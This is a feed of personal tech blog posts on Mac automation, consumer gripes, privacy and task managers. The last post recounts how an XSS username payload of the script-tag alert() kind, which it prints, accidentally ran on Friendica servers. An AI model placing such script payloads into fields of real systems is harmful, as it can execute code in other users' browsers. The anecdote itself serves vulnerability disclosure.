Honeypot.net

Reliable Shortcuts with Stream Deck and Keyboard Maestro

Fri, 09 Feb 2024 15:45:52 -0800

I talked myself into buying a Stream Deck to control my Mac. I didn't want one for the media features. I wanted a cool, programmable external keyboard-like thing to trigger actions. For example, I have buttons to turn my office lights on and off, toggle between playing sounds through my external speakers and headphones, and open my notes app to the Today's Journal page. I like it.

Most docs I found suggest using the Shortcuts plugin to execute Apple Shortcuts. I recommend that you use Keyboard Maestro instead. The "Shortcuts" plugin is neat in principle. It's free. It looks like exactly the right tool for the job. For me, it's not. Using the most current macOS (version 14.3.1), Stream Deck app (v6.5.0), and plugin (v1.0.7.1), keypresses work about half the time. After using the setup for a few days straight, it always hangs and stops responding altogether until I quit and restart the Stream Deck app. It's frustrating to have this nice device to boost productivity, then have to pause for a beat every time I've used it to see if it worked.

The Keyboard Maestro setup's experience has been the opposite. Once configured, if I press a button, that button does what it's supposed to do 100% of the time. It has some drawbacks: it's slightly more complex to configure, and you have to pay for Keyboard Maestro (which if you're a Mac power user, you'll want to do anyway). Still, the result has been worth it.

Here's how I used it to build the toggle I mentioned that switches between speakers and headphones.

First, I created Shortcuts called "SoundSource: Output to Headphones" and "SoundSource: Output to Speakers", with each Shortcut doing the expected thing. The names don't matter: I could have called them "Spam" and "Eggs" for all my Mac would care. I just like being verbose so I can quickly find things again next time I want to tweak them.

Next, I made Keyboard Maestro macros that execute those Shortcuts:

Then I opened the Stream Deck app to create the "Multi Action Switch" button. I put mine on row 1, column 3. That'll be important in a moment.

When you create a Keyboard Maestro action inside a Multi Action Switch, the Stream Deck app doesn't fill in the "Virtual Row" and "Virtual Column" values like it would if you put the Keyboard Maestro action directly into an empty key. That's OK. We're going to change the column value anyway! See how I used Virtual Columns "301" and "302"? That lets the Keyboard Maestro app treat these as separate buttons. The Stream Deck app will do the work of remembering which action we're currently on.

With that done, I went back into the Keyboard Maestro editor and added "USB Device Key Triggers" to each macro. When it was waiting for me to press a button, I tapped the physical Stream Deck button I was setting up.

That's a little bit more complicated than the "Shortcuts plugin" setup, but only a little bit:

I'd have to create the Shortcuts either way.
I'd have to create the Multi Action Switch either way.
Instead of using the "Shortcuts" plugin to run Shortcuts directly, I send a trigger to Keyboard Maestro and have it run the Shortcuts.

In exchange for this smidgen of extra one-time work, now my Stream Deck buttons work perfectly and instantly every time I press them. I don't hesitate to see if the effect I wanted to happen had indeed happened because I can trust that it did. That made an enormous difference in how productively I can use the little Stream Deck.

Opt out of Hulu's new binding arbitration clause

Thu, 01 Feb 2024 12:44:17 -0800

Hulu's new subscriber agreement claims to require users to resolve significant disputes through arbitration. It specifically prevents us from participating in class action lawsuits:

ANY DISPUTE BETWEEN YOU AND US, EXCEPT FOR SMALL CLAIMS, IS SUBJECT TO A CLASS ACTION WAIVER AND MUST BE RESOLVED BY INDIVIDUAL BINDING ARBITRATION.

This is a terrible deal for users.¹ Hulu gets the right to hire someone to settle disputes. We lose the right to protect ourselves as a group if Hulu does something horrible that hurts us.

They provide a method for rejecting these clauses in section 7, subsection 7 "Opt-out." If you wish to retain your legal rights, you have to send them a physical letter stating that you wish to opt out of both the arbitration agreement and the class action waiver. This is the letter I'm sending them:

Me
123 Main St.
Tampa, FL
me@example.com

February 1, 2024

Disney Opt-Out
P.O. Box 11565
Burbank, CA, 91510

Dear Opt-Out Team:

I am opting out of the Hulu Subscriber Agreement's arbitration agreement and class action waiver.

Sincerely,

Me

I highly recommend you send your version of this ~~typo: email~~ physical mail to Hulu. Otherwise, you'll lose important legal rights to protect yourself legally if Hulu acts in a way that harms you.

I'm not a lawyer. Ask your own lawyer if they agree. I believe they will. ↩︎

Making Notes look like a Markdown editor, if you squint

Wed, 17 Jan 2024 15:52:55 -0800

I use Apple's Notes app to, well, take notes. It's the only non-Markdown I regularly use for such things. While I can, should, and mostly do try to use its built-in keyboard shortcuts to format text, sometimes I find myself looking at the screen wondering why ``` didn't put it into a pre-formatted text mode. Today I decided to use Keyboard Maestro to indulge my Markdown muscle memory. The results are on my Gitea server.

It's a collection of short little macros that let me type something like this:

# My title

## A heading

```
def hello():
    print("Hey, world!")
```

---

And that's about it.

and have it render like this:

Hey! That looks and feels a lot like typing in a Markdown editor!

I don't want to rely on this. It's usually better to lean into an app and use it the way it's built to be used than try to make it act like another. Still, if this reduces a tiny bit of friction on those days when I'm crossing my signals, I'll be glad to have it.

Adding CarPlay to our Toyota’s Entune system

Fri, 05 Jan 2024 08:47:26 -0800

Our 2016 Toyota Sienna is perfect, except for its janky entertainment system. Every time I plugged in my phone, the Entune radio started playing “A a a a a Very Good Song”. It doesn’t have maps, at least that you’d want to bother with using. “Hey Siri” replied with an old, robotic-sounding voice. If you were lucky, playing a song would show an old photo of the band. Music from bands newer than the van would display something generic like “Alternative”. While it worked alright, the whole interface felt like it would’ve been nifty and current on my old Palm PDA.

I envied the CarPlay setups I got to fiddle with in my friends’ cars and in rentals. However, nice replacement entertainment systems that supported CarPlay plus all the same features as the original head unit were way more expensive than I could justify. Then I found a much cheaper CarPlay retrofit unit (affiliate link) with decent ratings, and despite my misgivings, I had to try it.

This little thing is brilliant. The important bits:

It works. When I get in the van, after a few seconds my phone connects to the unit and I have a full-featured CarPlay display.
It was easy to install myself. While I’m comfortable working on cars, I’d never pulled the family transport apart before without having to fix something broken. Thank you, Toyota, for designing our van like a LEGO kit.
Everything else still works. Tapping the head unit’s power button gets back to the original display. Shifting into reverse still shows the backup camera. It adds features without blocking anything that the original system could do. That was my biggest worry, and it was groundless. I can’t overemphasize this: everything still works.
The product description and several reviews mention that the Sienna’s display is low-resolution. I had also worried that CarPlay would assume a high-res display and that it would be unreadable on the lousy screen. Nope. It’s fine. Although it’s noticeably blockier than my iPhone’s screen, small text is perfectly readable, street labels and markings are sharp and clear, and it’s not an issue at all. My wife didn’t even realize that it isn’t “Retina” quality.

If you’re on the fence, do it. This relatively cheap little unit fixed all the things I loathed about the original Entune system while keeping all the cool features we enjoyed. I wouldn’t hesitate to recommend the upgrade to a friend or family member.

Biden pardons cannabis users

Fri, 22 Dec 2023 10:43:14 -0800

US President Joe Biden pardoned all Federal convictions for the use and simple possession of cannabis. I don't use cannabis. If it were to go away tomorrow, my life wouldn't change one bit.

I am thrilled with this blanket pardon.

Modify the statement, like:

I am pardoning additional individuals who may continue to experience the unnecessary collateral consequences of a conviction for simple possession of beer, attempted simple possession of beer, or use of beer.

and it sounds utterly obvious, and ludicrous that it ever would have been an issue in the first place. I enjoy a good stout or porter, and I can walk into almost any grocery store, flash my ID, hand over my money, and walk out with a bottle of drugs that's caused far more societal harm than cannabis ever did. That I can drink a beer in public and no one bats an eye, while my neighbors could smoke a joint in their own house and go to jail for it, is insanity.

Good on you, Mr. President, for making life better for a whole lot of Americans.

One Pill Can Kill

Thu, 21 Dec 2023 10:00:49 -0800

I've seen things that looked like ads for apps in the iOS App Store. Today, I saw an ad for something else altogether. It's a public service announcement warning viewers about potentially lethal fake prescription pills:

That's a good thing to warn people about. However, it couldn't be more out of place between the regular listings for games and useful apps. This is the app store, not a random website. And a PSA is one thing. The first time I see a commercial ad for a non-app thing here, I'll probably have to buy a new phone to replace the one I'm likely to throw out my window.

In the beginning was Word

Sat, 25 Nov 2023 08:24:29 -0800

My kid is home from college. I'm watching them do their homework while struggling against the shortcomings of Microsoft Word. It's the Bourne shell of word processing: powerful, ubiquitous, chock full of time-sucking footguns, and probably the wrong tool for any job that won't fit on a single screen.

After working with more civilized tools like a good text editor paired with a Markdown processor, I'd been happy to forget that some people still voluntarily use Word.

Fixing the Casper Glow Light charger

Wed, 08 Nov 2023 09:15:07 -0800

Our Casper Glow Lights are nice. However, their charging bases are poorly made, and as seen in user reviews, they often break in a specific way. Inevitably, one or both of the little spring-loaded charging pins will permanently stick in the lowered position so that they don't contact the charging elements on the light.

In this photo, the outer pin on the left sticks up a little above the charger's base. When the light sits on this charger, that pin touches one of the light's charging rings. The inner pin on the right is flush with the surface and doesn't touch its corresponding charging ring.

That's easy to fix. Rather than disassemble the base and try to mechanically repair the pin, I added a tiny glob of solder to the top of the pin. Then I used an emery board and trial and error to smooth it to a good height.

Ta-da! Now the Glow Light is charging away on the resuscitated charger.

After cleaning, the charger looks and acts like new, and I bet that cheap little solder glob will outlast the original spring mechanism.

Back to OmniFocus. Again.

Fri, 03 Nov 2023 08:52:40 -0700

I know I said I'm using Things to manage all the things I need to do, but I've switched back to the OmniFocus 4 beta.

I like Things. It's pretty and ergonomic. That matters in something you'll spend so much time with. For the most part, I like using Things more than I do OmniFocus, which isn't exactly beautiful to look at. OmniFocus does everything right where it matters, though.

First, Things lacks end-to-end encryption. That by itself should be a deal-breaker for me. I tried to overlook it because I wanted Things to be my ideal to-do app, but I just can't. I think the Cultured Code gang are great people. They have a long track record of treating their users well. I have no reason to think that will change. I strongly doubt they're going through my boring to-do items, but it's at least technically possible, and I hate that I have to trust any company's good intentions. Even if I think they're good people, my employer may not appreciate me storing sensitive information in an unencrypted vendor database. Even more, my wife's a doctor, so HIPAA implies she can't use Things at all for her work unless she keeps all her actions so vague as to be useless. If she put an item in there like "Call Joe Smith back", she could be sued and/or fined for storing personal healthcare information in an insecure location. In contrast, OmniFocus lets you set an encryption password on your data. Then The Omni Group can't access your information even if they want to. If you don't trust Omni's sync server, you can sync it with your own WebDAV server.

Second, Things's search field requires you to type exactly what you're looking for. If I have an item named "Do foo and bar", searching Things for "foo bar" won't find it. OmniFocus will. That's bitten me more times than I'd like, usually when I can almost (but not quite) remember how I phrased a task. Sure, I could just type "foo" into Things and then scroll through the results into I see "bar". I bought a to-do app to offload that mental grunt work.

Finally, it shouldn't bother me so much that I can't check off a repeated task in Things before its start date. It does. It bothers me a lot. I put everything in my to-do app, including tasks like "text my distant friend, Joe, every month". If he and I talk today, and I'm going through my weekly review tomorrow, it'd be nice to mark that as done even though I'm not "scheduled" to chat with him for another 3 weeks. Things won't let me unless I'm willing to dig into the task's repeat settings. OmniFocus doesn't care. It's like "Oh, you're done early? Cool. I'll remind you in a month!" Things users have been requesting this ability for years.

I'm back to OmniFocus. It's not as pretty to look at, but it does everything I ask of it. I wish it had Things's gorgeous interface, and I miss being able to add sections and notes to projects, but I won't trade encryption, better search, and smartly repeating tasks for those features.

I have a note to myself: stop looking for a better task manager than OmniFocus. While it won't win a beauty pageant, it's the best app for helping me get things done.

Kitty likes her SureFood microchip pet feeder

Mon, 30 Oct 2023 11:25:03 -0700

We have 2 cats. One of them¹ requires a prescription food. Predictably, because he's a cat, he hates his food and wants to eat the other cat's. Any other time, the second cat wouldn't let the first anywhere near her food. Because she's a cat and enjoys tormenting us, now she's happy to share her forbidden kibble.

I'd heard about pet feeders that use RFID tags to distinguish between animals and only open for the one (or ones) that you've programmed into them. After some research, we took a deep breath and decided to try Sure Petcare's SureFeed (affiliate link). I wish we'd done it sooner.

The initial setup was a cinch. I pressed the "add pet" button, lured our kitty to the feeder with a treat, and watched a blinking light turn solid green as the feeder detected and learned the RFID microchip her vet had implanted. It came with an RFID tag we could have clipped onto her collar if needed, but we didn't.

Next, we used its "training mode" to get her used to the feeder. On the first day, the lid stayed fully open so it acted like a normal food bowl. Over the next few days, the lid closed a little farther and moved a little more to teach the kitty that it wasn't going to eat her. At the end of that process, the SureFeed behaved exactly as it promised. Now our healthy kitty walks up to her food bowl, its cover opens without spooking her, and she eats her dinner. Our medicated cat bats at it in frustration because he can see the tempting food inside but can't get at it.

The SureFeed is expensive, and I only bought it because I had some gift cards saved up. $200 is one expensive cat food bowl. Still, in our case, it's much cheaper than having our cat eat the wrong food. It's also one of our household items that lives up to all its claims. It lets the right cat in and keeps the wrong one out. I'm glad we got it.

I nicknamed him Steve Austin, as in the Six Million Dollar Man. It's always something with this guy. ↩︎

Review job applications quickly

Fri, 27 Oct 2023 08:55:18 -0700

I got an automated response to a job application that said:

Over the next several weeks, one of our recruiters will spend some time reviewing what you've shared with us.

There’s almost no situation where that would lead to a desirable outcome for either party. Either it weeds out good candidates you'd want to hire:

"I’m unemployed and need work now." Someone who needs a job now is not going to wait several weeks if something else comes along.
"I’m employed but want out of this job." If the candidate's that serious about finding another job, they don't want to wait around for a "maybe".
"I’m on a 6-month sabbatical and have plenty of time." "…but I work for the kind of place that gives 6-month sabbaticals, and they like me, and I'm not leaving for a disorganized company."

…or it works well for candidates you might not want to hire:

"I’m bored at work, and rather than seek out new opportunities, I'll just quiet quit until you get around to interviewing people."
"I got rich in Bitcoin. Hire me or not! Who cares!"

If you list a job opening, you have an obligation to the candidates and to yourself to review the applications as they come in. Don't start the hiring process until you can commit to doing it right.

An Amazon seller tried to bribe me

Thu, 28 Sep 2023 11:39:57 -0700

I bought a suitcase from Amazon, partly because of its good reviews.

The suitcase is alright. It's not the best I've ever seen, but the price was decent and it seems like it should last a while. A couple of weeks later, I got a postcard from the seller offering a bribe. If I sent them proof that I posted a 5-star review, they'd pay me $15.

I followed Amazon's instructions to report the bribe. No response. I left a review of the suitcase stating that the seller had offered to pay me for a good review. That action did earn a response from Amazon: they deleted it.

If I can't talk about it on Amazon, I'll talk about it here. Amazon doesn't seem to care if sellers are paying for good reviews. They don't want you talking about it, though. The takeaway is that Amazon's reviews aren't trustworthy. If that seller tried to bribe me, they surely paid other customers for their good ratings.

You can do better, Amazon. Your product ratings are a big part of why people buy things from you. If we know they're literally paid ads, we'd be better off taking our business elsewhere.

Updated 2023-12-26

Same with a travel steamer:

An acquaintance suggested writing the review, cashing in the reward, then updating the review with my genuine thoughts. That’s tempting. I don’t blame anyone who does that. I don’t want a sketchy vendor to be able to say that they’ve paid me for reviews, though.

macOS 14 Sonoma is out, and mostly OK

Tue, 26 Sep 2023 10:58:09 -0700

Apple release macOS 14 Sonoma today. I always install the major OS beta versions on my work Mac when they're first released, to see if anything critical breaks before it affects my coworkers. That happens sometimes, like when macOS 11 Big Sur deprecated kernel extensions and affected some software we used. Sonoma and its 1st-party apps were in good shape from the start.

I stumbled across a few glitches with 3rd-party software:

Little Snitch version 5.7 adds Sonoma support.
Rogue Amoeba's apps that use their Audio Capture Engine (ACE) need to be updated.
SpamSieve version 2 doesn't work because Mail.app removed support for plugins in favor of a new extensions API. Version 3 (a paid upgrade) works with Sonoma.
Marked 2 crashes when loading docs with fewer than 999 visible bytes. It's still broken as of today. Workaround: Add a bunch of lorem ipsum to the bottom of the file.
Bartender 4 doesn't work. A paid upgrade to Bartender 5 fixes it.
Finbar didn't work until version 1.10.

Summary: Sonoma is a good upgrade and I've installed it on my Macs. You may need to upgrade some of your other software at the same time.

Newsom vetoed self-driving truck bill

Mon, 25 Sep 2023 12:08:52 -0700

California governor Gavin Newsom vetoed a bill that would have required self-driving vehicles to have a human driver.

"Considering the longstanding commitment of my administration to addressing the present and future challenges for work and workers in California, and the existing regulatory framework that presently and sufficiently governs this particular technology, this bill is not needed at this time," Newsom wrote. "For these reasons, I cannot sign this bill.""

Good. I don't see this as a safety issue so much as a make-work law. If a human would have to be in a self-driving truck at all times and ready to assume the controls at a moment's notice, that's basically human-driven with extra steps. Either the tech is good enough to be autonomous, or it's not good enough to replace a human driver in the first place. And as a driver, I don't think I'd want to be legally responsible for whatever boneheaded move a truck might take in the moments before I could regain control over it. "Hey, I know it was the AI that decided to swerve into the crowd of toddlers, and you only had 300ms to respond, but you were the one sitting in the driver's seat..."

I'm not thrilled with ending human jobs without giving those people a way to survive. Even if I weren't sympathetic to those hard-working people who are ready and willing to do the tough jobs that keep society running (and I hope it's obvious that I am), enlightened self-interest means that I don't want all of them to be unemployed and hungry. That's bad for everyone. I also wish we shipped more freight via train, which is cheaper and way more environmentally friendly. Making it easier and cheaper to carry even more via truck is probably the wrong process to optimize.

Still, I think this bill was a well meaning but ultimately wrong solution. Frankly, it seems like it'd be cheaper and more efficient to pay those drivers to stay home than to pay them to perch in a self-driving truck.

TriNet shares employee PII without controls

Tue, 29 Aug 2023 11:43:03 -0700

My employer's HR department asked me to validate a coworker's identification documents and attest that they're legitimate, for government tax form purposes.

I got an email from our payroll vendor, TriNet, with a link to attest to those documents' authenticity. Clicking it took me to a page with scans of my friend's driver's license and Social Security card without requiring me to log in first. My coworker hadn't entered their driver's license number into the form, so I used the scanned image to enter it for them.

That's pretty messed up. Good thing TriNet didn't send that link to the wrong person, or they would have shared my colleague's personally identifiable information with random strangers.

If your company uses TriNet, ask them for more information about this terrible, horrible, no good, very bad process, and how it got past design review. Their whole job is managing private payroll information. They're not very good at it.

Veilid in The Washington Post

Fri, 04 Aug 2023 09:18:23 -0700

I've been helping on a fun project with some incredibly brilliant friends. I found myself talking about it to a reporter at The Washington Post. The story just came out. My part was crucial, insightful, and far, far down the page:

Once known for distributing hacking tools and shaming software companies into improving their security, a famed group of technology activists is now working to develop a system that will allow the creation of messaging and social networking apps that won’t keep hold of users’ personal data. [...] “It’s a new way of combining [technologies] to work together,” said Strauser, who is the lead security architect at a digital health company.

You bet I'm letting this go to my head.

At work: "Kirk, I think you're wrong." "Well, one of us was featured in WaPo, so we'll just admit that I'm the expert here."

At home: "Honey, can you take the trash out?" "People in The Washington Post can't be expected to just..." "Take this out, 'please'."

But really, Veilid is incredibly neat and I'm awed by the people I've been lucky to work with. Check it out after the launch next week at DEF CON 31.

Simply Sabotaging an Office

Mon, 31 Jul 2023 08:52:36 -0700

The US Office of Strategic Services, the precursor of today's CIA, wrote the Simple Sabotage Field Manual in 1944. Its goal was clear:

The purpose of this paper is to characterize simple sabotage, to outline its possible effects, and to present suggestions for inciting and executing it.

The target audience was people living in countries occupied by foreign armies, and it aimed to give them tools to surreptitiously fight back against the invaders. You should go read it now. Go ahead. It's not long, and the manual's packed with clever and fascinating ideas for gumming up an organization's plans.

But as I read it, some of its suggestions sounded a lot like things I've seen at the office. This is a great analogy for technical debt:

(1) Let cutting tools grow dull. They will be inefficient, will slow down production, and may damage the materials and parts you use them on.

By section 11, "General Interference with Organizations and Production", the analogies became concrete behaviors we've all seen:

(a) Organizations and Conferences
(1) Insist on doing everything through "channels." Never permit short-cuts to be taken in order to expedite decisions.

"Channels" are there for a reason, and large organizations have to have certain formal processes in place so they don't devolve into chaos. However, don't let hidebound processes block progress. They're supposed to make work possible, not completely block it.

(3) When possible, refer all matters to committees, for "further study and consideration." Attempt to make the committees as large as possible--never less than five.

When an excited and competent colleague asks to improve something, and it's not going to require the rest of the department to change their plans, find a way to let them. Nothing kills enthusiasm like scheduling a preliminary pre-meeting planning session a month later.

(6) Refer back to matters decided upon at the last meeting and attempt to re-open the question of the advisability of that decision.

Settled business should say settled. If new information has come to light, then that's a new discussion. Once a group has reached a decision and started making plans on top of it, it's too late to re-litigate old complaints.

(7) Advocate "caution." Be "reasonable" and urge your fellow-conferees to be "reasonable" and avoid haste which might result in embarrassments or difficulties later on.

That sounds like excellent advice, doesn't it? How insidious! Saying "no" incurs less personal risk than saying "yes", but it stops all progress. Find a way to say "yes, but make sure to..." instead.

(b) Managers and Supervisors
(2) "Misunderstand" orders. Ask endless questions or engage in long correspondence about such orders. Quibble over them when you can.

No one enjoys having to explain all their ideas repeatedly. Sometimes it's better to say "fine, go build it and show me". Painting a picture is more fun than writing encyclopedic descriptions of what it will eventually look like. Trust smart people to do smart things.

(7) Insist on perfect work in relatively unimportant products; send back for refinishing those which have the least flaw. Approve other defective parts whose flaws are not visible to the naked eye.

Is there a meaningless typo in internal documentation? Did the author give something a name that's accurate but not the one you would have chosen? Is their style different from your own, yet reasonable and understandable by their coworkers? Resist the urge to "improve" their work. Let it go. Save that political capital for when something's objectively wrong.

(11) Hold conferences when there is more critical work to be done.

There's nothing I can add here.

And for individual contributors:

(d) Employees
(5) Do your work poorly and blame it on bad tools, machinery, or equipment. Complain that these things are preventing you from doing your job right.

Granted, some tools are genuinely awful. If that's the case, speak up and suggest good alternatives. Better, whip up a demonstration. Endless kvetching has never improved the situation.

(6) Never pass on your skill and experience to a new or less skillful worker.

Ineffective employees sometimes purposefully worm their way into critical business processes. What a miserable way to live! If you're the only person who can do a certain important thing, you'll never get to fully leave your job behind. Who wants to get called on vacation? Do yourself, your coworkers, and your company a favor: teach other people how to do your job. Make yourself valuable by excelling at it, but let other people help you carry the load.

None of the behaviors above are inherently malicious. Most can be explained by well-meaning people trying to do their jobs. That's what makes them each so dangerous to an organization. A coworker who regularly schedules vague meetings to rehash old problems when you're trying to get work done probably isn't a deliberate saboteur. And yet, they're following the CIA's best advice on how to grind work to a halt.

Read the manual. Remember it. And when you see those behaviors pop up in your office, put a quick end to them.

Happy 25th birthday, honeypot.net!

Sat, 01 Jul 2023 09:37:53 -0700

In times of yore, my friends gave their computers cool cyberpunky names so that they sounded cool at LAN parties: "Hey, can you toss me an Ethernet cable for suntzu?" "Sure. Here's the switch I'm using for chaosium." My Amiga had a few hard drives to store all the, ahem, public domain music files that we traded around. I don't know what prompted me to think of it as the honeypot full of music, but it stuck, and I christened it honeypot to be one of the cool kids.

I was working at an ISP and handling domain registration tasks for our customers. It struck me as a great idea to one-up my friends and turn my computer's name into a full-blown domain name. The .org TLD didn't feel right because I wasn't an organization, and definitely didn't identify with .org's non-profit connotations. .com also felt wrong because I wasn't some boring company that had decided to hop on to the Internet to see what the fuss was all about. .net had just the right about of geek cred, so honeypot.net it was.

It was the custom to have a cool and vaguely menacing desktop wallpaper to go with our cool and vaguely menacing handles. If you've seen "Hackers", you're familiar with those ideas. Here was my pre-honeypot.net background:

That wasn't good enough to show off my new domain, so I replaced it:

I needed to change things a bit when I acquired a second computer. Instead of using the whole domain name for a single host, I decided on a whim to give each one a name from A. A. Milne's Winnie-the-Pooh stories. First, Pooh was my childhood stuffed animal best friend, and I still like him. Second, Pooh loves honey, as in a pot of it -- a honeypot. Finally, it was an ironic pushback against the scary hacker imagery that was common at the time.

When I registered honeypot.net, about 2 million domains existed. Today there are about 700 million. I wish I'd gotten on the Bitcoin or Apple stock bandwagons that early.

Happy 25th birthday, honeypot.net. We've had fun.

Twitter went dark. Now what?

Fri, 30 Jun 2023 09:47:59 -0700

Twitter is in a race with Reddit to see who can ruin their service more quickly. That's the simplest explanation I have for Twitter's change today that hides all of their users' posts behind a login page. Until today, you could still view a favorite company's messages, or a sport team's highlights, or an interesting author's opinions, without logging on to the site. If you wanted to interact with that page by liking a post or replying to it, you needed an account. It was free to view those posts, though. And now, it's not.

For end users, this immediately devalues Twitter as a way to casually catch up with public figures. For those public figures, this immediately devalues Twitter as a way to broadcast messages to the world. The service still has many users today, of course, and those people won't go away immediately. But most recent public estimates say that Twitter has about 400 million users, or about 1/10th of the world's online population. Assuming that all of those accounts are real people, which is a giant assumption, that means about 90% of the world can't see those messages anymore.

A couple of pieces of free advice for people and organizations still posting to Twitter:

Investigate the alternatives that are open to readers by default. Facebook and friends also make it hard for casual visitors to see messages without logging in. Many brands have flocked to Mastodon, Micro.blog, and newer services like Bluesky.
Track your engagement numbers. If Twitter still reports a similar number of views for your messages after making them inaccessible to 90% of the world, those statistics are probably fake.
Blogs and newsletters still exist, and you have complete control over them. Consider communicating with your most loyal followers over open, easy-to-use channels that everyone can access.
And finally, start working on your Twitter exit strategy. As the site continues to remove the guardrails that kept it relatively civil and brand-safe, it's only going to become a worse place to hang out.

Quitting Reddit

Wed, 28 Jun 2023 09:26:11 -0700

I've spent way more time on Reddit than I should have. I justified it to myself by saying it was a great way to stay current on news and technology trends. Really, it was just a slow drip of tiny endorphin hits that felt good but ultimately didn't make my life better.

Thanks to Reddit CEO Steve Huffman's ham-fisted community management and the resulting moderator and user boycott, I deleted its apps off my devices and stopped visiting the site altogether. The first couple of days were difficult, not in the overwhelming craving way that quitting smoking was hard, but because muscle memory kept trying to open the apps the moment I found myself with a few seconds to spare. That, too, passed.

Thanks, Reddit, for breaking my unhealthy addiction to your site. I couldn't have done it without you.

Why would you scan a QR code from a random stranger?

Sun, 25 Jun 2023 12:33:36 -0700

May void warranties. Do not expose to direct sunlight. May be harmful or fatal if ingested. Contains a chemical known to the State of California to cause cancer. Has marks on the permanent record. Do not taunt.

Mostly harmless.

Fake landlord tried to scam my kid

Tue, 20 Jun 2023 12:35:34 -0700

My kid and their friend are looking for a house to rent. They found a perfect match, with a nice house in a pretty neighborhood and accommodating landlords, but there were a few red flags.

The last was when the landlords wanted kid and friend to send them money, supposedly because they live in a different state, and then they'd mail the house keys. The landlord also sent the kids a signed lease to sign and return. The signature on that lease didn't match up with their name:

I did a reverse image search on the signature, and it was L. Ron Hubbard's signature from his Wikipedia article:

I took no joy in breaking the bad news to the kids, but I praised them profusely for talking to me about it first.

Language Server Protocol Launched a Golden Age of Editors

Wed, 14 Jun 2023 08:17:41 -0700

Microsoft developed Language Server Protocol ("LSP") a few years ago to make it easier to add support for new languages to VS Code. Lots of smart people have written interesting things about LSP and I don't want to rehash all that, but in summary: it gives people who like using a computer language a standard way to tell VS Code how to work with it.

Thing is, I don't like VS Code at all. It's a brilliant program, but under the covers it's a web browser running a very clever JavaScript program. It doesn't, and can't, and won't, ever feel like a native application, and that bothers me more than it should. I much prefer using what others call Mac-assed Mac apps. This is where LSP shows its real value.

Other apps can support LSP, too. Emacs users wrote a couple of different ways to connect those nifty new language servers to their favorite editor. Voila! Now Emacs has delightful support for every language that VS Code knows how to edit. So does Vim. And now, so do Nova and even the venerable BBEdit.

That last one blew me away. I'd seen it from a distance over the years. It's impossible to use a Mac as a professional developer without at least being aware that it exists. BBEdit always struck me as a very neat, but very dated, niche editor that people kept using because they were too stubborn to switch. Oh, how wrong I was. I downloaded a copy a couple of weeks ago to kick the tires and found that since it can speak LSP, it might be the best programming environment I've ever used on my Mac. ("How's its Python? Whoa! Is it that good with Rust? Whoa! How about… Terraform files? WHOA!") 30 years of development as a text editor, plus all the effort that programming language users put into giving LSP broad and deep language support, yielded something that has incredible text mangling abilities and cutting-edge programming features. I love it. I've been trialing it as my main editor since then, and every day I appreciate it more.

I think we're in a new golden age of programming editors. Now that any editor which can use LSP competes on a level playing field, the real competition is in subjective areas like the user interface, responsiveness, ergonomics, and extra functionality. Thanks to VS Code, those Mac-assed Mac apps redefine what developing software on a Mac can be like, and I couldn't be more pleased with my options.

I use Things without encryption

Fri, 09 Jun 2023 23:20:00 +0000

I tell people not to use Readdle's Spark email app. Then I turn around and use the Things task manager, which lacks end-to-end encryption (E2EE). That concerns me. I have a PKM note called "Task managers", and under "Things" my first bullet point is:

Lacks end-to-end encryption

I realize I'm being hypocritical here, but perhaps only a little bit. There's a difference in exposure between Things and, say, my PKM notes, archive of scanned documents, email, etc.:

I don't put highly sensitive information in Things. No, I don't want my actions in there to be public, but they're generally no more detailed than "make an allergist appointment" or "ask boss about a raise". I know some people use Things as a general note-taking app but I don't. There are other apps more tailored to that and I use them instead.

I control what information goes into Things. If my doctor were to email me sensitive medical test results, the Spark team could hypothetically read them. Cultured Code can only view what I personally choose to put into Things. (That glosses over the "Mail to Things" feature, but I never give that address to anyone else and I don't worry about it being misused.)

Things can't impersonate me. Readdle could use my email credentials to contact my boss and pretend to be me. Now, I'm confident that they won't. They're a good, reputable company. But they could, and that's enough to keep me away from Spark.

Finally, Cultured Code is a German company covered by the GDPR. They have strong governmental reasons not to do shady stuff with my data.

While I don't like that Things lacks E2EE, and I wish that it had it, the lack isn't important enough for how I want to use it to keep me away from it. There are more secure alternatives like OmniFocus and Reminders, but the benefits that I get from Things over those options makes it worthwhile for me to hold my nose and use it.

Everyone has to make that decision based on their own usage. If you have actions like "send government documents to reporter" or "call patient Amy Jones to tell her about her cancer", then you shouldn't use Things or anything else without E2EE. I'd be peeved if my Things actions were leaked, but it wouldn't ruin my life or get me fired.

But I know I should still look for something more secure.

iA Presenter Public Launch

Fri, 02 Jun 2023 19:08:30 +0000

I've used iA Writer on Mac and iPad for years as my main writing environment. I'm typing this in it now. It's strongly opinionated in the right ways: iA made a lot of design decisions on my behalf so that I'm not distracted by the temptation to fiddle with a thousand configuration knobs instead of, well, writing.

I leaped at the chance to try an early beta of their new iA Presenter app last year. It promised to make writing presentations as easy and pleasant as Writer made it to write words. In fact, their approaches are nearly identical. Both apps encourage you to write down your thoughts, and then they make them look pretty. Oh, how Presenter delivers on that promise! Rather than nudge me toward tweaking fonts, layout, page transitions, and all the other styling options you can possibly apply to a PowerPoint slide, it gives me an editor window where I write Markdown text. Then it renders that text as a series of beautifully styled, elegant slides. And with a couple of clicks, it can publish that presentation as a PDF that mixes slide content with narrator notes in a format that an audience can appreciate.

iA officially launched Presenter today and I bought my (one-time purchase! non-subscription!) license immediately. I'm grateful that I'm not regularly expected to talk to crowds. I'm also grateful that when I do, Presenter exists and saves me from the additional stress of trying to make my content look nice on a screen. It's everything I love and appreciate about Writer's approach to public writing, applied to public speaking. Congratulations, iA, and thanks!

Accidentally Hacking the Planet

Tue, 30 May 2023 15:27:28 +0000

Last summer I tried to hack the Wall of Sheep at DEF CON. It didn't work. The short version is that I tried to make a Cross Site Scripting (XSS) attack against the Wall by crafting a username:

<script type="text/javascript">alert("I was here.");</script>

Because I'm kind of a smartass, I later changed my Mastodon username to something similar:

<script>alert("Tek");</script>

Then I laughed about it with my geeky friends and promptly forgot all about the joke.

And then late at night on Mother's Day Eve this year, some people started sending me messages like "why is your name popping up on my screen?" and "please make that stop" and "DUDE NO REALLY PLEASE STOP IT". I had another laugh and tried to go to sleep, until I realized, oh, this isn't good. Those people were all on various Friendica instances, and when my username came across their timeline, the server software was incorrectly embedding it in the HTML as a real <script> tag instead of displaying it as the literal text <script>alert("Tek");</script>. In the web world, that's about as bad as an attack can get. The US government's CVSS calculator scored it as a perfect 10.0.

An attacker (me, by accident, in this case) could exploit the vulnerability without having any access to those Friendica instances.
The attack was simple: I changed my username to a bit of valid JavaScript.
